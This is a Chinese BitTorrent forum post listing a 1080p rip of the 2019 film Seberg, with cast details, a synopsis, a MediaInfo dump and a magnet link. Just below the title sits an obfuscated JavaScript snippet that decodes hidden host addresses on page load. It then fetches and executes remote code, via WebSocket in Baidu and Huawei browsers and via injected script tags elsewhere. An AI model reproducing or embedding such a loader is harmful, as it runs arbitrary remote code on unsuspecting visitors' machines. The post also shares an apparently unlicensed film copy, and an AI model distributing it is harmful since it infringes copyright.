茜宝[双语字幕].Seberg.2019.1080p.BluRay.DTS.x265-10bit 9.12GB

版主小s 1月前 251

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 茜宝 / 四面受敌 / 反击恶势力 / Against All Enemies
◎片  名 Seberg
◎年  代 2019
◎产  地 美国 / 英国
◎类  别 剧情 / 惊悚 / 传记
◎语  言 英语
◎上映日期 2019-08-30(威尼斯电影节) / 2019-12-13(美国)
◎IMDb链接 https://www.imdb.com/title/tt1780967/
◎豆瓣评分 6.1/10 (1392人评价)
◎豆瓣链接 https://movie.douban.com/subject/27594919/
◎片  长 102分钟
◎导  演 本尼迪克特·安德鲁斯 Benedict Andrews (id:1355503)
◎编  剧 乔·施雷普内尔 Joe Shrapnel (id:1354941)
       安娜·沃特豪斯 Anna Waterhouse (id:1354942)
◎演  员 克里斯汀·斯图尔特 Kristen Stewart (id:1012533)
       安东尼·麦凯 Anthony Mackie (id:1027217)
       玛格丽特·库里 Margaret Qualley (id:1341251)
       莎姬·贝兹 Zazie Beetz (id:1370059)
       文斯·沃恩 Vince Vaughn (id:1002673)
       斯蒂芬·鲁特 Stephen Root (id:1041136)
       杰克·奥康奈尔 Jack O'Connell (id:1022761)
       詹姆斯·乔丹 James Jordan (id:1254272)
       杰德·佩蒂约翰 Jade Pettyjohn (id:1345905)
       科尔姆·米尼 Colm Meaney (id:1019029)
       罗宾·托马斯 Robin Thomas (id:1156675)
       瑟达吕斯·布兰 Ser'Darius Blain (id:1329000)
       小科尼利厄斯·史密斯 Cornelius Smith Jr. (id:1238338)
       伊万·阿达勒 Yvan Attal (id:1014087)
       乔纳·福尔肯 Jonah Falcon (id:1090319)
       希拉·M·洛克哈特 Sheila M. Lockhart (id:1382289)
       克劳德·诺尔顿 Claude Knowlton (id:1108143)
       泰德·霍利斯 Ted Hollis (id:1172109)
       托比亚斯·特鲁维利昂 Tobias Truvillion (id:1181425)
       雅各布·泰勒 Jacob Taylor (id:1238815)
       凯瑞·威斯特科特 Kerry Westcott (id:1430064)
       安妮-玛丽·奥尔森 Anne-Marie Olsen (id:1430741)
       杰德·库泽尔 Jed Kurzel (id:1376075)

◎标  签 传记 / 美国 / 克里斯汀·斯图尔特 / KristenStewart / 剧情 / 政治 / 2019 / 美国电影

◎简  介
  克里斯汀·斯图尔特将主演政治惊悚新片《四面受敌》(Against All Enemies),饰演美国影星、法国新浪潮的短发女神珍·茜宝。杰克·奥康奈尔、安东尼·麦凯、玛格丽特·库里、科尔姆·米尼参演,本尼迪克特·安德鲁斯(《乌娜》)执导。                                       
                                    讲述1960年代晚期,茜宝因同情和支持黑豹党(美国左翼黑人民权组织),并与其成员有来往,与民权运动家Hakim Jamal(麦凯饰演)也有情愫。她引起了美国联邦调查局的注意,一位年轻探员(奥康奈尔饰演)对其展开调查。                                       
                                    由Automatik Entertainment制作,Fred Berger(《爱乐之城》《远山恋人》)、Brian Kavanaugh-Jones(《潜伏4》《午夜逃亡》)、Kate Garwood、Stephen Hopkins任制片人,Joe Shrapnel&Anna Waterhouse(《...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 279603281340149985492001320008104922172 (0xD259A219EE9DCC387E5DF876B501CC3C)

  4. Complete name                            : [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 9.12 GiB

  8. Duration                                 : 1 h 42 min

  9. Overall bit rate                         : 12.7 Mb/s

  10. Movie name                               : Seberg 2019 1080p BluRay DTS [email protected]

  11. Encoded date                             : UTC 2021-08-14 07:28:48

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 42 min

  21. Bit rate                                 : 11.1 Mb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 828 pixels

  24. Display aspect ratio                     : 2.35:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.292

  31. Stream size                              : 7.99 GiB (88%)

  32. Title                                    : [email protected]

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 42 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 509 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 1.08 GiB (12%)

  51. Title                                    : English

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 32 min

  62. Bit rate                                 : 26.7 kb/s

  63. Count of elements                        : 1877

  64. Stream size                              : 17.7 MiB (0%)

  65. Title                                    : CHS

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 32 min

  76. Bit rate                                 : 27.3 kb/s

  77. Count of elements                        : 1877

  78. Stream size                              : 18.2 MiB (0%)

  79. Title                                    : CHT

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Text #3

  84. ID                                       : 5

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 1 h 32 min

  90. Bit rate                                 : 45.8 kb/s

  91. Count of elements                        : 1877

  92. Stream size                              : 30.5 MiB (0%)

  93. Title                                    : CHS&ENG

  94. Language                                 : Chinese

  95. Default                                  : No

  96. Forced                                   : No


  97. Text #4

  98. ID                                       : 6

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 32 min

  104. Bit rate                                 : 46.4 kb/s

  105. Count of elements                        : 1877

  106. Stream size                              : 30.9 MiB (0%)

  107. Title                                    : CHT&ENG

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No


  111. Menu

  112. 00:00:00.000                             : en:Chapter 01

  113. 00:07:05.792                             : en:Chapter 02

  114. 00:15:57.792                             : en:Chapter 03

  115. 00:22:04.333                             : en:Chapter 04

  116. 00:31:23.500                             : en:Chapter 05

  117. 00:40:29.500                             : en:Chapter 06

  118. 00:50:17.042                             : en:Chapter 07

  119. 01:00:49.042                             : en:Chapter 08

  120. 01:11:58.708                             : en:Chapter 09

  121. 01:21:57.250                             : en:Chapter 10



TAGS 剧情 惊悚 传记

磁力链:
  • magnet:?xt=urn:btih:899F07E908E6B02F145D01444DA1E0FAC047444D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回